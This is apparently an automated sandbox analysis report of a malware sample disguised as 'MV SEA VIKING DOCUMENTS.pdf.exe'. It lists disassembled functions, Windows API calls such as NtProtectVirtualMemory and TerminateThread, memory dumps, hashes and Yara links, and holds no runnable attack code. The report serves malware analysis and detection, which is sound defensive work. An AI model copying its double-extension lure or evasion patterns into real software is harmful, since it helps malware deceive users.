                                                                                                                                                                                                                                Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040304A
                                                                                                                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                                                                                                                • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                                                                                                                                                                • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405513 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00405542
                                                                                                                                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                                                                                                                                                                                                                  • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                                                                                                                                                                • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040640B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll), ref: 0040645C
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                                                                                                                • String ID: Call
                                                                                                                                                                                                                                • API String ID: 3356406503-1824292864
                                                                                                                                                                                                                                • Opcode ID: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
                                                                                                                                                                                                                                • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00403B57 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,76F73420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00403B78
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Free$GlobalLibrary
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                • API String ID: 1100898210-3355392842
                                                                                                                                                                                                                                • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                                                                                                                                                                • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405E58 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe,C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00405E5E
                                                                                                                                                                                                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe,C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe,80000000,00000003), ref: 00405E6E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharPrevlstrlen
                                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                                • API String ID: 2709904686-3370423016
                                                                                                                                                                                                                                • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                                                                                • Instruction ID: d2786f61c86b799b8b6ecf14661ff9643eaf9d362a95097130d0805b1e4d2bc4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36D0A7B3410D20DAC3126718DC04DAF73ECFF6134074A442AF481A71A4D7785E8186ED
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405F92 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
                                                                                                                                                                                                                                • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 190613189-0
                                                                                                                                                                                                                                • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                                                                                • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:0.1%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                Total number of Nodes:16
                                                                                                                                                                                                                                Total number of Limit Nodes:1
                                                                                                                                                                                                                                execution_graph 67010 1f212b20 67012 1f212b2a 67010->67012 67013 1f212b3f LdrInitializeThunk 67012->67013 67014 1f212b31 67012->67014 67015 1671528 67016 1671554 67015->67016 67017 1671573 NtProtectVirtualMemory 67016->67017 67018 167156a Sleep 67016->67018 67020 1671604 67017->67020 67018->67017 67024 1f2129f0 LdrInitializeThunk 67025 16713f4 67026 167142c NtProtectVirtualMemory 67025->67026 67027 16714c1 67026->67027 67031 167100a 67032 1671045 TerminateThread 67031->67032 67033 1671089 67032->67033

                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                Function 0167151A Relevance: 3.0, APIs: 2, Instructions: 46sleepCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2764494173.0000000001671000.00000040.00000400.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1671000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                                • Opcode ID: 013313a600c7594047a81d687323772962f5fced72aae4c5821c2cf1805eeeba
                                                                                                                                                                                                                                • Instruction ID: 7ddc91e2501288f1d97323c8eac7a9184fffab3728ce8d3965d87e4a085cae28
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 013313a600c7594047a81d687323772962f5fced72aae4c5821c2cf1805eeeba
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9101C0F0900301AFE7094E25CC9CB59B7A2AF1A371F5A818ADC534B0A2E7B4C9C1CF11
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0167134E Relevance: 1.6, APIs: 1, Instructions: 88nativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 63 167134e-16713a9 65 16713af-16713b2 63->65 66 16714ca-1671509 63->66 65->66 67 16713b8-16713cd call 167125b call 16712d1 65->67 67->66 72 16713d3-16713d6 67->72 72->66 73 16713dc-16714c7 NtProtectVirtualMemory 72->73
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 01671463
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2764494173.0000000001671000.00000040.00000400.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1671000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2706961497-0
                                                                                                                                                                                                                                • Opcode ID: dd6cd841c0e6efaa7b7549ff7228ffee915e4f676a6050f057edf7c7e41dd1e5
                                                                                                                                                                                                                                • Instruction ID: 4e85b24d1a7cf07d654e0997caf5d1f94ffda8fc04ce778e08c5d7d29c3971c5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd6cd841c0e6efaa7b7549ff7228ffee915e4f676a6050f057edf7c7e41dd1e5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 622172B11113025FD7208E78CD91B663BAAEF67724F604269DC46DB296E364C4815511
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 01671360 Relevance: 1.6, APIs: 1, Instructions: 81nativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 76 1671360-16713a9 78 16713af-16713b2 76->78 79 16714ca-1671509 76->79 78->79 80 16713b8-16713cd call 167125b call 16712d1 78->80 80->79 85 16713d3-16713d6 80->85 85->79 86 16713dc-16714c7 NtProtectVirtualMemory 85->86
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 01671463
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2764494173.0000000001671000.00000040.00000400.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1671000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2706961497-0
                                                                                                                                                                                                                                • Opcode ID: be204c76b4db8741d6422613f43df7de421dca8cb70cc583f44711fce12746dd
                                                                                                                                                                                                                                • Instruction ID: f90827eb730dbfc6fd3bfb9a4e08251e34e4514b0265ab16f0449c5c78a5f0f3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be204c76b4db8741d6422613f43df7de421dca8cb70cc583f44711fce12746dd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F21AEE20853D65AC70186A85D4BF677EF99F93A48F2802CEDC85AB19BD31B9042D730
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 01671342 Relevance: 1.6, APIs: 1, Instructions: 70nativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 89 1671342-16713a9 92 16713af-16713b2 89->92 93 16714ca-1671509 89->93 92->93 94 16713b8-16713cd call 167125b call 16712d1 92->94 94->93 99 16713d3-16713d6 94->99 99->93 100 16713dc-16714c7 NtProtectVirtualMemory 99->100
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 01671463
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2764494173.0000000001671000.00000040.00000400.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1671000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2706961497-0
                                                                                                                                                                                                                                • Opcode ID: 11885116ce108d9d86a7298ba08e4e584bb8b2dfc453a4cac440cfb433882562
                                                                                                                                                                                                                                • Instruction ID: bb1ac8a828f9641aa6ac289f6c31bba43a5f0348fef716e1d5d9d79498fdf5f5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11885116ce108d9d86a7298ba08e4e584bb8b2dfc453a4cac440cfb433882562
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4117B711023119FDB108F74CD91BA63BAEEF26710F65425ADC8ADB262D724C4818A24
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 016713F4 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 103 16713f4-1671483 NtProtectVirtualMemory 105 16714c1-16714c7 103->105
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 01671463
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2764494173.0000000001671000.00000040.00000400.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1671000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2706961497-0
                                                                                                                                                                                                                                • Opcode ID: c0c9da6a27d455730096ff43a6d9bca2c85dab4ec51787f65f994161bf0851f8
                                                                                                                                                                                                                                • Instruction ID: c6ec753fbd41e9a02c5861ec210348ec2cd530b53896f02b73ac2d073c13da1e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0c9da6a27d455730096ff43a6d9bca2c85dab4ec51787f65f994161bf0851f8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D41103D20C53D619C30186A8694FF5BBEF95D97D9CB6843DEAC856B18BC71B9002D330
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 01671598 Relevance: 1.5, APIs: 1, Instructions: 44nativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
